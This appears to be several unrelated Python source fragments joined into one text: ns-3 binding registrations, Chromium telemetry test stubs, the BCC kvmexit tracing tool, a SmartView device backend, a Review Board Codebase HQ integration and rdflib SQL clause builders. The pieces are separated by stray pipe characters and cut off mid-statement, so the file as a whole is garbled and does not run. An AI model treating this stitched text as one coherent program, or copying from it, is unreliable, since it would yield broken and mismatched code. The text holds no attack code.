## attribute.h (module 'core'): bool ns3::AttributeAccessor::Get(ns3::ObjectBase const * object, ns3::AttributeValue & attribute) const [member function]
cls.add_method('Get',
'bool',
[param('ns3::ObjectBase const *', 'object'), param('ns3::AttributeValue &', 'attribute')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasGetter() const [member function]
cls.add_method('HasGetter',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasSetter() const [member function]
cls.add_method('HasSetter',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::Set(ns3::ObjectBase * object, ns3::AttributeValue const & value) const [member function]
cls.add_method('Set',
'bool',
[param('ns3::ObjectBase *', 'object', transfer_ownership=False), param('ns3::AttributeValue const &', 'value')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3AttributeChecker_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker(ns3::AttributeChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeChecker const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): bool ns3::AttributeChecker::Check(ns3::AttributeValue const & value) const [member function]
cls.add_method('Check',
'bool',
|
device_path, as_root=False): # pylint: disable=W0613
return self.mock_content
def GetProp(self, property_name):
return self.system_properties[property_name]
def SetProp(self, property_name, property_value):
self.system_properties[property_name] = property_value
class CloudStorageModuleStub(object):
PUBLIC_BUCKET = 'chromium-telemetry'
PARTNER_BUCKET = 'chrome-partner-telemetry'
INTERNAL_BUCKET = 'chrome-telemetry'
BUCKET_ALIASES = {
'public': PUBLIC_BUCKET,
'partner': PARTNER_BUCKET,
'internal': INTERNAL_BUCKET,
}
# These are used to test for CloudStorage errors.
INTERNAL_PERMISSION = 2
PARTNER_PERMISSION = 1
PUBLIC_PERMISSION = 0
# Not logged in.
CREDENTIALS_ERROR_PERMISSION = -1
class NotFoundError(Exception):
pass
class CloudStorageError(Exception):
pass
class PermissionError(CloudStorageError):
pass
class CredentialsError(CloudStorageError):
pass
def __init__(self):
self.default_remote_paths = {CloudStorageModuleStub.INTERNAL_BUCKET:{},
CloudStorageModuleStub.PARTNER_BUCKET:{},
CloudStorageModuleStub.PUBLIC_BUCKET:{}}
self.remote_paths = self.default_remote_paths
self.local_file_hashes = {}
self.local_hash_files = {}
self.permission_level = CloudStorageModuleStub.INTERNAL_PERMISSION
self.downloaded_files = []
def SetPermissionLevelForTesting(self, permission_level):
self.permission_level = permission_level
def CheckPermissionLevelForBucket(self, bucket):
if bucket == CloudStorageModuleStub.PUBLIC_BUCKET:
return
elif (self.permission_level ==
CloudStorageModuleStub.CREDENTIALS_ERROR_PERMISSION):
raise CloudStorageModuleStub.CredentialsError()
elif bucket == CloudStorageModuleStub.PARTNER_BUCKET:
if self.permission_level < CloudStorageModuleStub.PARTNER_PERMISSION:
raise CloudStorageModuleStub.PermissionError()
elif bucket == CloudStorageModuleStub.INTERNAL_BUCKET:
if self.permission_level < CloudStorageModuleStub.INTERNAL_PERMISSION:
raise CloudStorageModuleStub.PermissionError()
elif bucket not in self.remote_paths:
raise CloudStorageModuleStub.NotFoundError()
def SetRemotePathsForTesting(self, remote_path_dict=None):
if not remote_path_dict:
self.remote_paths = self.default_remote_paths
return
self.remote_paths = remote_path_dict
def GetRemotePathsForTesting(self):
if not self.remote_paths:
self.remote_paths = self.default_remote_paths
return self.remote_paths
# Set a dictionary of data files and their "calculated" hashes.
def SetCalculatedHashesForTesting(self, calculated_hash_dictionary):
self.local_file_hashes = calculated_hash_dictionary
def GetLocalDataFiles(self):
return self.local_file_hashes.keys()
# Set a dictionary of hash files and the hashes they should contain.
def SetHashFileContentsForTesting(self, hash_file_dictionary):
self.local_hash_files = hash_file_dictionary
def GetLocalHashFiles(self):
return self.local_hash_files.keys()
def ChangeRemoteHashForTesting(self, bucket, remote_path, new_hash):
self.remote_paths[bucket][remote_path] = new_hash
def List(self, bucket):
if not bucket or bucket not in self.remote_paths:
bucket_error = ('Incorrect bucket specified, correct buckets:' +
str(self.remote_paths))
raise CloudStorageModuleStub.CloudStorageError(bucket_error)
CloudStorageModuleStub.CheckPermissionLevelForBucket(self, bucket)
return list(self.remote_paths[bucket].keys())
def Exists(self, bucket, remote_path):
CloudStorageModuleStub.CheckPermissionLevelForBucket(self, bucket)
return remote_path in self.remote_paths[bucket]
def Insert(self, bucket, remote_path, local_path):
CloudStorageModuleStub.CheckPermissionLevelForBucket(self, bucket)
if local_path not in self.GetLocalDataFiles():
file_path_error = 'Local file path does not exist'
raise CloudStorageModuleStub.CloudStorageError(file_path_error)
self.remote_paths[bucket][remote_path] = (
CloudStorageModuleStub.CalculateHash(self, local_path))
return remote_path
def GetHelper(self, bucket, remote_path, local_path, only_if_changed):
CloudStorageModuleStub.CheckPermissionLevelForBucket(self, bucket)
if not remote_path in self.remote_paths[bucket]:
if only_if_changed:
return False
raise CloudStorageModuleStub.NotFoundError('Remote file does not exist.')
remote_hash = self.remote_paths[bucket][remote_path]
local_hash = self.local_file_hashes[local_path]
if only_if_changed and remote_hash == local_hash:
return False
self.downloaded_files.append(remote_path)
self.local_file_hashes[local_path] = remote_hash
self.local_hash_files[local_path + '.sha1'] = remote_hash
return remote_hash
def Get(self, bucket, remote_path, local_path):
return CloudStorageModuleStub.GetHelper(self, bucket, remote_path,
local_path, False)
def GetIfChanged(self, local_path, bucket=None):
remote_path = os.path.basename(local_path)
if bucket:
return CloudStorageModuleStub.GetHelper(self, bucket, remote_path,
local_path, True)
result = CloudStorageModuleStub.GetHelper(
self, self.PUBLIC_BUCKET, remote_path, local_path, True)
if not result:
result = CloudStorageModuleStub.GetHelper(
self, self.PARTNER_BUCKET, remote_path, local_path, True)
if not result:
result = CloudStorageModuleStub.GetHelper(
self, self.INTERNAL_BUCKET, remote_path, local_path, True)
return result
def GetFilesInDirectoryIfChanged(self, directory, bucket):
if os.path.dirname(directory) == directory: # If in the root dir.
raise ValueError('Trying to serve root directory from HTTP server.')
for dirpath, _, filenames in os.walk(directory):
for filename in filenames:
path, extension = os.path.splitext(
os.path.join(dirpath, filename))
if extension != '.sha1':
continue
self.GetIfChanged(path, bucket)
def CalculateHash(self, file_path):
return self.local_file_hashes[file_path]
def ReadHash(self, hash_path):
return self.local_hash_files[hash_path]
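# Illustrative only: how a test might drive the stub above (the file path and
# hash here are made up):
def _example_cloud_storage_stub_usage():
    stub = CloudStorageModuleStub()
    stub.SetCalculatedHashesForTesting({'/tmp/data.bin': 'abc123'})
    stub.Insert(stub.PUBLIC_BUCKET, 'data.bin', '/tmp/data.bin')
    assert stub.Exists(stub.PUBLIC_BUCKET, 'data.bin')
    assert stub.List(stub.PUBLIC_BUCKET) == ['data.bin']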
class LoggingStub(object):
def __init__(self):
self.warnings = []
self.errors = []
def info(self, msg, *args):
pass
def error(self, msg, *args):
self.errors.append(msg % args)
def warning(self, msg, *args):
self.warnings.append(msg % args)
def warn(self, msg, *args):
self.warning(msg, *args)
class OpenFunctionStub(object):
class FileStub(object):
def __init__(self, data):
self._data = data
def __enter__(self):
return self
def __exit__(self, *args):
pass
def read(self, size=None):
if size:
return self._data[:size]
else:
return self._data
def write(self, data):
self._data.write(data)
def close(self):
pass
def __init__(self):
self.files = {}
def __call__(self, name, *args, **kwargs):
return OpenFunctionStub.FileStub(self.files[name])
class OsModuleStub(object):
class OsEnvironModuleStub(object):
def get(self, _):
return None
class OsPathModuleStub(object):
def __init__(self, sys_module):
self.sys = sys_module
self.files = []
self.dirs = []
def exists(self, path):
return path in self.files
def isfile(self, path):
return path in self.files
def isdir(self, path):
return path in self.dirs
def join(self, *paths):
def IsAbsolutePath(path):
if self.sys.platform.startswith('win'):
return re.match('[a-zA-Z]:\\\\', path)
else:
return path.startswith('/')
# Per Python specification, if any component is an absolute path,
# discard previous components.
for index, path in reversed(list(enumerate(paths))):
if IsAbsolutePath(path):
paths = paths[index:]
|
# kvmexit.py
#
# Display the exit_reason and its statistics of each vm exit
# for all vcpus of all virtual machines. For example:
# $./kvmexit.py
# PID TID KVM_EXIT_REASON COUNT
# 1273551 1273568 EXIT_REASON_MSR_WRITE 6
# 1274253 1274261 EXIT_REASON_EXTERNAL_INTERRUPT 1
# 1274253 1274261 EXIT_REASON_HLT 12
# ...
#
# Besides, we also allow users to specify one pid, tid(s), or one
# pid and its vcpu. See kvmexit_example.txt for more examples.
#
# @PID: each virtual machine's pid in the user space.
# @TID: the user space's thread of each vcpu of that virtual machine.
# @KVM_EXIT_REASON: the reason why the vm exits.
# @COUNT: the counts of the @KVM_EXIT_REASONS.
#
# REQUIRES: Linux 4.7+ (BPF_PROG_TYPE_TRACEPOINT support)
#
# Copyright (c) 2021 ByteDance Inc. All rights reserved.
#
# Author(s):
# Fei Li <lifei.shirley@bytedance.com>
from __future__ import print_function
from time import sleep
from bcc import BPF
import argparse
import multiprocessing
import os
import subprocess
#
# Process Arguments
#
def valid_args_list(args):
args_list = args.split(",")
for arg in args_list:
try:
int(arg)
except:
raise argparse.ArgumentTypeError("must be valid integer")
return args_list
# arguments
examples = """examples:
./kvmexit # Display kvm_exit_reason and its statistics in real-time until Ctrl-C
./kvmexit 5 # Display in real-time after sleeping 5s
./kvmexit -p 3195281 # Collapse all tids for pid 3195281 with exit reasons sorted in descending order
./kvmexit -p 3195281 20 # Collapse all tids for pid 3195281 with exit reasons sorted in descending order, and display after sleeping 20s
./kvmexit -p 3195281 -v 0 # Display only vcpu0 for pid 3195281, descending sort by default
./kvmexit -p 3195281 -a # Display all tids for pid 3195281
./kvmexit -t 395490 # Display only for tid 395490 with exit reasons sorted in descending order
./kvmexit -t 395490 20 # Display only for tid 395490 with exit reasons sorted in descending order after sleeping 20s
./kvmexit -T '395490,395491' # Display for a union like {395490, 395491}
"""
parser = argparse.ArgumentParser(
description="Display kvm_exit_reason and its statistics at a timed interval",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=examples)
parser.add_argument("duration", nargs="?", default=99999999, type=int, help="show delta for next several seconds")
parser.add_argument("-p", "--pid", type=int, help="trace this PID only")
exgroup = parser.add_mutually_exclusive_group()
exgroup.add_argument("-t", "--tid", type=int, help="trace this TID only")
exgroup.add_argument("-T", "--tids", type=valid_args_list, help="trace a comma separated series of tids with no space in between")
exgroup.add_argument("-v", "--vcpu", type=int, help="trace this vcpu only")
exgroup.add_argument("-a", "--alltids", action="store_true", help="trace all tids for this pid")
args = parser.parse_args()
duration = int(args.duration)
#
# Setup BPF
#
# load BPF program
bpf_text = """
#include <linux/delay.h>
#define REASON_NUM 69
#define TGID_NUM 1024
struct exit_count {
u64 exit_ct[REASON_NUM];
};
BPF_PERCPU_ARRAY(init_value, struct exit_count, 1);
BPF_TABLE("percpu_hash", u64, struct exit_count, pcpu_kvm_stat, TGID_NUM);
struct cache_info {
u64 cache_pid_tgid;
struct exit_count cache_exit_ct;
};
BPF_PERCPU_ARRAY(pcpu_cache, struct cache_info, 1);
FUNC_ENTRY {
int cache_miss = 0;
int zero = 0;
u32 er = GET_ER;
if (er >= REASON_NUM) {
return 0;
}
u64 cur_pid_tgid = bpf_get_current_pid_tgid();
u32 tgid = cur_pid_tgid >> 32;
u32 pid = cur_pid_tgid;
if (THREAD_FILTER)
return 0;
struct exit_count *tmp_info = NULL, *initial = NULL;
struct cache_info *cache_p;
cache_p = pcpu_cache.lookup(&zero);
if (cache_p == NULL) {
return 0;
}
if (cache_p->cache_pid_tgid == cur_pid_tgid) {
//a. If the cur_pid_tgid hit this physical cpu consecutively, save it to pcpu_cache
tmp_info = &cache_p->cache_exit_ct;
} else {
//b. If another pid_tgid matches this pcpu for the last hit, OR it is the first time to hit this physical cpu.
cache_miss = 1;
// b.a Try to load the last cache struct if exists.
tmp_info = pcpu_kvm_stat.lookup(&cur_pid_tgid);
// b.b If it is the first time for the cur_pid_tgid to hit this pcpu, employ a
// per_cpu array to initialize pcpu_kvm_stat's exit_count with each exit reason's count is zero
if (tmp_info == NULL) {
initial = init_value.lookup(&zero);
if (initial == NULL) {
return 0;
}
pcpu_kvm_stat.update(&cur_pid_tgid, initial);
tmp_info = pcpu_kvm_stat.lookup(&cur_pid_tgid);
// To pass the verifier
if (tmp_info == NULL) {
return 0;
}
}
}
if (er < REASON_NUM) {
tmp_info->exit_ct[er]++;
if (cache_miss == 1) {
if (cache_p->cache_pid_tgid != 0) {
// b.*.a Let's save the last hit cache_info into kvm_stat.
pcpu_kvm_stat.update(&cache_p->cache_pid_tgid, &cache_p->cache_exit_ct);
}
// b.* As the cur_pid_tgid meets current pcpu_cache_array for the first time, save it.
cache_p->cache_pid_tgid = cur_pid_tgid;
bpf_probe_read(&cache_p->cache_exit_ct, sizeof(*tmp_info), tmp_info);
}
return 0;
}
return 0;
}
"""
# format output
exit_reasons = (
"EXCEPTION_NMI",
"EXTERNAL_INTERRUPT",
"TRIPLE_FAULT",
"INIT_SIGNAL",
"N/A",
"N/A",
"N/A",
"INTERRUPT_WINDOW",
"NMI_WINDOW",
"TASK_SWITCH",
"CPUID",
| "N/A",
"HLT",
"INVD",
"INVLPG",
"RDPMC",
"RDTSC",
"N/A",
"VMCALL",
"VMCLEAR",
"VMLAUNCH",
"VMPTRLD",
"VMPTRST",
"VMREAD",
"VMRESUME",
"VMWRITE",
"VMOFF",
"VMON",
"CR_ACCESS",
"DR_ACCESS",
"IO_INSTRUCTION",
"MSR_READ",
"MSR_WRITE",
"INVALID_STATE",
"MSR_LOAD_FAIL",
"N/A",
"MWAIT_INSTRUCTION",
"MONITOR_TRAP_FLAG",
"N/A",
"MONITOR_INSTRUCTION",
"PAUSE_INSTRUCTION",
"MCE_DURING_VMENTRY",
"N/A",
"TPR_BELOW_THRESHOLD",
"APIC_ACCESS",
"EOI_INDUCED",
"GDTR_IDTR",
"LDTR_TR",
"EPT_VIOLATION",
"EPT_MISCONFIG",
"INVEPT",
"RDTSCP",
"PREEMPTION_TIMER",
"INVVPID",
"WBINVD",
"XSETBV",
"APIC_WRITE",
"RDRAND",
"INVPCID",
"VMFUNC",
"ENCLS",
"RDSEED",
"PML_FULL",
"XSAVES",
"XRSTORS",
"N/A",
"N/A",
"UMWAIT",
"TPAUSE"
)
#
# Do some checks
#
try:
# Currently only adapted to the Intel architecture
cmd = "cat /proc/cpuinfo | grep vendor_id | head -n 1"
arch_info = subprocess.check_output(cmd, shell=True).strip()
if b"Intel" in arch_info:
pass
else:
raise Exception("Currently we only support Intel architecture, please do expansion if needs more.")
# Check if kvm module is loaded
if os.access("/dev/kvm", os.R_OK | os.W_OK):
pass
else:
raise Exception("Please insmod kvm module to use kvmexit tool.")
except Exception as e:
raise Exception("Failed to do precondition check, due to: %s." % e)
try:
if BPF.support_raw_tracepoint_in_module():
# Let's firstly try raw_tracepoint_in_module
func_entry = "RAW_TRACEPOINT_PROBE(kvm_exit)"
get_er = "ctx->args[0]"
else:
# If raw_tp_in_module is not supported, fall back to regular tp
func_entry = "TRACEPOINT_PROBE(kvm, kvm_exit)"
get_er = "args->exit_reason"
except Exception as e:
raise Exception("Failed to catch kvm exit reasons due to: %s" % e)
def find_tid(tgt_dir, tgt_vcpu):
for tid in os.listdir(tgt_dir):
path = tgt_dir + "/" + tid + "/comm"
re, clear_current)
return preset
def on_preset_stored(self, *args, **kwargs):
kwargs['backend'] = self
self.emit('on_preset_stored', *args, **kwargs)
def on_preset_active(self, instance, value, **kwargs):
self.emit('on_preset_active', backend=self, preset=instance, value=value)
def on_num_outputs(self, instance, value, **kwargs):
if value == len(self.output_labels):
return
if value != len(self.crosspoints):
self.crosspoints = [0] * value
self.output_labels = [''] * value
def on_num_inputs(self, instance, value, **kwargs):
if value == len(self.input_labels):
return
if value != len(self.crosspoints):
self.crosspoints = [0] * value
self.input_labels = [''] * value
def on_prop_feedback(self, instance, value, **kwargs):
prop = kwargs.get('property')
if prop.name not in self.feedback_prop_map:
return
elock = self.emission_lock(prop.name)
control_prop = self.feedback_prop_map[prop.name]
setattr(self, control_prop, value[:])
def on_prop_control(self, instance, value, **kwargs):
if not self.prelude_parsed or not self.connection_state.is_connected:
return
prop = kwargs.get('property')
keys = kwargs.get('keys')
if keys is None:
keys = range(len(value))
feedback_prop = '{}s'.format(prop.name.split('_control')[0])
elock = self.emission_lock(feedback_prop)
if elock.held:
return
## TODO: This is an internal implementation in python-dispatch and
## is subject to future changes.
aio_lock = elock.aio_locks.get(id(self.event_loop))
if aio_lock is not None and aio_lock.locked():
return
if value == getattr(self, feedback_prop):
return
coro_name = '_'.join(['set', feedback_prop])
coro = getattr(self, coro_name)
args = [(key, value[key]) for key in keys]
tx_fut = asyncio.run_coroutine_threadsafe(coro(*args), loop=self.event_loop)
class SmartViewBackendBase(BackendBase):
"""Base class for SmartView devices
Attributes:
num_monitors: Number of physical monitors as reported by the device
inverted: ``True`` if the device has been mounted in an inverted
configuration (to optimize viewing angle).
monitors: A ``list`` containing instances of :class:`SmartViewMonitor`
or :class:`SmartScopeMonitor`, depending on device type.
:Events:
.. function:: on_monitor_property_change(self: SmartViewBackendBase, name: str, value: Any, monitor: SmartViewMonitor = monitor)
Dispatched when any :class:`~pydispatch.properties.Property`
value changes. The event signature for callbacks is
``(smartview_device, property_name, value, **kwargs)`` containing
a keyword argument "monitor" containing the :class:`SmartViewMonitor`
instance.
"""
num_monitors: Optional[int] = Property()
inverted: bool = Property(False)
monitors: List['SmartViewMonitor'] = ListProperty()
monitor_cls: ClassVar[type] = None
device_type: ClassVar[str] = 'smartview'
_events_ = ['on_monitor_property_change']
def __init__(self, **kwargs):
self.bind(monitors=self._on_monitors)
super().__init__(**kwargs)
async def set_monitor_property(self, monitor, name, value):
"""Set a property value for the given :class:`SmartViewMonitor` instance
Arguments:
monitor: The :class:`SmartViewMonitor` instance to set
name (str): Property name
value: The new value to set
This method is a coroutine.
"""
raise NotImplementedError()
def get_monitor_cls(self):
cls = self.monitor_cls
if cls is None:
cls = SmartViewMonitor
return cls
async def add_monitor(self, **kwargs):
cls = self.get_monitor_cls()
kwargs.setdefault('parent', self)
kwargs.setdefault('index', len(self.monitors))
monitor = cls(**kwargs)
monitor.bind(on_property_change=self.on_monitor_prop)
self.monitors.append(monitor)
return monitor
def on_monitor_prop(self, instance, name, value, **kwargs):
kwargs['monitor'] = instance
self.emit('on_monitor_property_change', self, name, value, **kwargs)
def _on_monitors(self, *args, **kwargs):
self.num_monitors = len(self.monitors)
class SmartScopeBackendBase(SmartViewBackendBase):
device_type: ClassVar[str] = 'smartscope'
def get_monitor_cls(self):
cls = self.monitor_cls
if cls is None:
cls = SmartScopeMonitor
return cls
MONITOR_PROPERTY_MAP = {k:k.title() for k in [
'brightness', 'contrast', 'saturation', 'identify', 'border']}
MONITOR_PROPERTY_MAP.update({
'widescreen_sd':'WidescreenSD',
'audio_channel':'AudioChannel',
'scope_mode':'ScopeMode',
})
class SmartViewMonitor(Dispatcher):
"""A single instance of a monitor within a SmartView device
Attributes:
index: Index of the monitor (zero-based)
name: The name of the monitor (can be user-defined)
brightness: The brightness value of the monitor (0-255)
contrast: The contrast value of the monitor (0-255)
saturation: The saturation value of the monitor (0-255)
widescreen_sd: Aspect ratio setting for SD format. Choices can be:
``True`` (stretching enabled), ``False`` (pillar-box), or
``None`` (auto-detect).
identify: If set to ``True``, the monitor's border will be white
for a brief duration to physically locate the device.
border: Sets the border of the monitor to the given color. Choices
are: 'red', 'green', 'blue', 'white', or ``None``.
audio_channel: The audio channel pair (Embedded in the SDI input)
used when :attr:`scope_mode` is set to audio monitoring.
Values are from 0 to 7 (0 == Channels 1&2, etc).
"""
index: int = Property()
name: str = Property()
brightness: int = Property()
contrast: int = Property()
saturation: int = Property()
widescreen_sd: Optional[bool] = Property()
identify: bool = Property(False)
border: Optional[str] = Property()
audio_channel: int = Property()
class PropertyChoices():
widescreen_sd = {
True:'ON',
False:'OFF',
None:'auto',
}
border = {
'red':'red',
'green':'green',
'blue':'blue',
'white':'white',
None:'NONE',
}
identify = {
True:'true',
False:'false',
}
_bind_properties = [
'brightness', 'contrast', 'saturation',
'widescreen_sd', 'identify', 'border', 'audio_channel',
]
_events_ = ['on_property_change']
def __init__(self, **kwargs):
self._property_locks = {}
self.parent = kwargs.get('parent')
self.event_loop = self.parent.event_loop
self.index = kwargs.get('index')
self.name = kwargs.get('name')
props = self.PropertyChoices._bind_properties
for prop in props:
value = kwargs.get(prop)
value = self.get_property_for_choice(prop, value)
setattr(self, prop, value)
self.bind(**{prop:self.on_prop_control for prop in props})
def _get_property_lock(self, name):
lock = self._property_locks.get(name)
if lock is None:
lock = asyncio.Lock()
self._property_locks[name] = lock
return lock
async def set_property_from_backend(self, name, value):
value = self.get_property_for_choice(name, value)
lock = self._get_property_lock(name)
async with lock:
setattr(self, name, value)
self.emit('on_property_change', self, name, value)
async def set_property(self, name, value):
await self.parent.set_monitor_property(self, name, value)
if child_nodes:
result = dict([
(child.tagName, self._parse_xml_node(child))
for child in child_nodes
])
else:
result = self.get_xml_text(node.childNodes)
return result
class CodebaseHQ(HostingService):
"""Repository hosting support for Codebase.
Codebase is a repository hosting service that supports Subversion, Git,
and Mercurial. It's available at https://codebasehq.com.
This integration provides repository validation and file fetching. Due to
API limitations, it does not support post-commit review at this time.
"""
name = 'Codebase HQ'
form = CodebaseHQForm
auth_form = CodebaseHQAuthForm
needs_authorization = True
supports_bug_trackers = True
supports_repositories = True
supported_scmtools = ['Git', 'Subversion', 'Mercurial']
repository_fields = {
'Git': {
'path': 'git@codebasehq.com:%(domain)s/'
'%(codebasehq_project_name)s/'
'%(codebasehq_repo_name)s.git',
},
'Subversion': {
'path': 'https://%(domain)s.codebasehq.com/'
'%(codebasehq_project_name)s/'
'%(codebasehq_repo_name)s.svn',
},
'Mercurial': {
'path': 'https://%(domain)s.codebasehq.com/'
'projects/%(codebasehq_project_name)s/repositories/'
'%(codebasehq_repo_name)s/',
},
}
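# Example interpolation (hypothetical values): with domain='mycompany',
# codebasehq_project_name='tools' and codebasehq_repo_name='scripts', the Git
# path above becomes git@codebasehq.com:mycompany/tools/scripts.git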
bug_tracker_field = (
'https://%(domain)s.codebasehq.com/projects/'
'%(codebasehq_project_name)s/tickets/%%s'
)
#: A mapping of Codebase SCM types to SCMTool names.
REPO_SCM_TOOL_MAP = {
'git': 'Git',
'svn': 'Subversion',
'hg': 'Mercurial',
}
def __init__(self, *args, **kwargs):
"""Initialize the hosting service.
Args:
*args (tuple):
Positional arguments for the parent constructor.
**kwargs (dict):
Keyword arguments for the parent constructor.
"""
super(CodebaseHQ, self).__init__(*args, **kwargs)
self.client = CodebaseHQClient(self)
def authorize(self, username, password, credentials, *args, **kwargs):
"""Authorize an account for Codebase.
Codebase uses HTTP Basic Auth with an API username (consisting of the
Codebase team's domain and the account username) and an API key (for
the password) for API calls, and a standard username/password for
Subversion repository access. We need to store all of this.
Args:
username (unicode):
The username to authorize.
password (unicode):
The API token used as a password.
credentials (dict):
Additional credentials from the authentication form.
*args (tuple):
Extra unused positional arguments.
**kwargs (dict):
Extra unused keyword arguments.
Raises:
reviewboard.hostingsvcs.errors.AuthorizationError:
The credentials provided were not valid.
"""
self.account.data.update({
'domain': credentials['domain'],
'api_key': encrypt_password(credentials['api_key']),
'password': encrypt_password(password),
})
# Test the account to make sure the credentials are fine. Note that
# we can only really sanity-check the API token, domain, and username
# from here. There's no good way to check the actual password,
# which we only use for Subversion repositories.
#
# This will raise a suitable error message if authorization fails.
try:
self.client.api_get_public_keys(username)
except AuthorizationError:
raise AuthorizationError(
ugettext('One or more of the credentials provided were not '
'accepted by Codebase.'))
self.account.save()
def is_authorized(self):
"""Return if the account has been authorized.
This checks if all the modern authentication details are stored along
with the account.
Returns:
bool:
``True`` if all required credentials are set for the account.
"""
return (self.account.data.get('api_key') is not None and
self.account.data.get('password') is not None and
self.account.data.get('domain') is not None)
def get_password(self):
"""Return the password for this account.
This is used primarily for Subversion repositories, so that direct
access can be performed in order to fetch properties and other
information.
This does not return the API key.
Returns:
unicode:
The account password for repository access.
"""
return decrypt_password(self.account.data['password'])
def check_repository(self, codebasehq_project_name=None,
codebasehq_repo_name=None, tool_name=None,
*args, **kwargs):
"""Check the validity of a repository.
This will perform an API request against Codebase to get information on
the repository. This will throw an exception if the repository was not
found, and return cleanly if it was found.
Args:
codebasehq_project_name (unicode):
The name of the project on Codebase.
codebasehq_repo_name (unicode):
The name of the repository on Codebase.
tool_name (unicode):
The name of the SCMTool for the repository.
*args (tuple):
Extra unused positional arguments passed to this function.
**kwargs (dict):
Extra unused keyword arguments passed to this function.
Raises:
reviewboard.hostingsvcs.errors.RepositoryError:
The repository was not found.
"""
# The form should enforce these values.
assert codebasehq_project_name
assert codebasehq_repo_name
assert tool_name
try:
info = self.client.api_get_repository(codebasehq_project_name,
codebasehq_repo_name)
except HostingServiceAPIError as e:
logging.error('Error finding Codebase repository "%s" for '
'project "%s": %s',
codebasehq_repo_name, codebasehq_project_name,
e)
raise RepositoryError(
ugettext('A repository with this name and project was '
'not found.'))
try:
scm_type = info['repository']['scm']
except KeyError:
logging.error('Missing "scm" field for Codebase HQ repository '
'payload: %r',
info)
raise RepositoryError(
ugettext('Unable to determine the type of repository '
'from the Codebase API. Please report this.'))
try:
expected_tool_name = self.REPO_SCM_TOOL_MAP[scm_type]
except KeyError:
logging.error('Unexpected "scm" value "%s" for Codebase HQ '
'repository, using payload: %r',
scm_type, info)
raise RepositoryError(
ugettext('Unable to determine the type of repository '
'from the Codebase API. Please report this.'))
if expected_tool_name != tool_name:
raise RepositoryError(
ugettext("The repository type doesn't match what you "
"selected. Did you mean %s?")
% expected_tool_name)
def get_file(self, repository, path, revision, *args, **kwargs):
"""Returns the content of a file in a repository.
This will perform an API request to fetch |
tables for the closed world universe given by the identifier
print "Destroyed Close World Universe %s ( in SQLite database %s)"%(self.identifier,home)
db.commit()
c.close()
db.close()
os.remove(os.path.join(home,self.identifier))
def EscapeQuotes(self,qstr):
"""
Ported from Ft.Lib.DbUtil
"""
if qstr is None:
return ''
tmp = qstr.replace("\\","\\\\")
tmp = tmp.replace('"', '""')
tmp = tmp.replace("'", "\\'")
return tmp
#This is overridden to leave unicode terms as is
#Instead of converting them to ascii (the default behavior)
def normalizeTerm(self,term):
if isinstance(term,(QuotedGraph,Graph)):
return term.identifier
elif isinstance(term,Literal):
return self.EscapeQuotes(term)
elif term is None or isinstance(term,(list,REGEXTerm)):
return term
else:
return term
#Where Clause utility Functions
#The predicate and object clause builders are modified in order to optimize
#subjects and objects utility functions which can take lists as their last argument (object,predicate - respectively)
def buildSubjClause(self,subject,tableName):
if isinstance(subject,REGEXTerm):
return " REGEXP (%s,"+" %s)"%(tableName and '%s.subject'%tableName or 'subject'),[subject]
elif isinstance(subject,list):
clauseStrings=[]
paramStrings = []
for s in subject:
if isinstance(s,REGEXTerm):
clauseStrings.append(" REGEXP (%s,"+" %s)"%(tableName and '%s.subject'%tableName or 'subject') + " %s")
paramStrings.append(self.normalizeTerm(s))
elif isinstance(s,(QuotedGraph,Graph)):
clauseStrings.append("%s="%(tableName and '%s.subject'%tableName or 'subject')+"%s")
paramStrings.append(self.normalizeTerm(s.identifier))
else:
clauseStrings.append("%s="%(tableName and '%s.subject'%tableName or 'subject')+"%s")
paramStrings.append(self.normalizeTerm(s))
return '('+ ' or '.join(clauseStrings) + ')', paramStrings
elif isinstance(subject,(QuotedGraph,Graph)):
return "%s="%(tableName and '%s.subject'%tableName or 'subject')+"%s",[self.normalizeTerm(subject.identifier)]
else:
return subject is not None and "%s="%(tableName and '%s.subject'%tableName or 'subject')+"%s",[subject] or None
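    # Shape of the return value above (illustrative, hypothetical table name):
    # each builder yields a (clauseString, params) pair, e.g. for a plain term
    #     ("kb_asserted_statements.subject=%s", [subject])
    # and for a list of terms an OR-joined clause such as
    #     ("(kb_asserted_statements.subject=%s or kb_asserted_statements.subject=%s)", [s1, s2])
    # Note that in the REGEXP branches the % formatting binds only to the
    # second string literal, producing clauses like " REGEXP (%s, subject)".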
    # Capable of taking a list of predicates as well (in which case sub-clauses are joined with 'OR')
def buildPredClause(self,predicate,tableName):
if isinstance(predicate,REGEXTerm):
return " REGEXP (%s,"+" %s)"%(tableName and '%s.predicate'%tableName or 'predicate'),[predicate]
elif isinstance(predicate,list):
clauseStrings=[]
paramStrings = []
for p in predicate:
if isinstance(p,REGEXTerm):
clauseStrings.append(" REGEXP (%s,"+" %s)"%(tableName and '%s.predicate'%tableName or 'predicate'))
else:
clauseStrings.append("%s="%(tableName and '%s.predicate'%tableName or 'predicate')+"%s")
paramStrings.append(self.normalizeTerm(p))
return '('+ ' or '.join(clauseStrings) + ')', paramStrings
else:
return predicate is not None and "%s="%(tableName and '%s.predicate'%tableName or 'predicate')+"%s",[predicate] or None
#Capable of taking a list of objects as well (in which case sub clauses are joined with 'OR')
def buildObjClause(self,obj,tableName):
if isinstance(obj,REGEXTerm):
return " REGEXP (%s,"+" %s)"%(tableName and '%s.object'%tableName or 'object'),[obj]
elif isinstance(obj,list):
clauseStrings=[]
paramStrings = []
for o in obj:
if isinstance(o,REGEXTerm):
clauseStrings.append(" REGEXP (%s,"+" %s)"%(tableName and '%s.object'%tableName or 'object'))
paramStrings.append(self.normalizeTerm(o))
elif isinstance(o,(QuotedGraph,Graph)):
                    clauseStrings.append("%s="%(tableName and '%s.object'%tableName or 'object')+"%s")
                    paramStrings.append(self.normalizeTerm(o.identifier))
else:
clauseStrings.append("%s="%(tableName and '%s.object'%tableName or 'object')+"%s")
paramStrings.append(self.normalizeTerm(o))
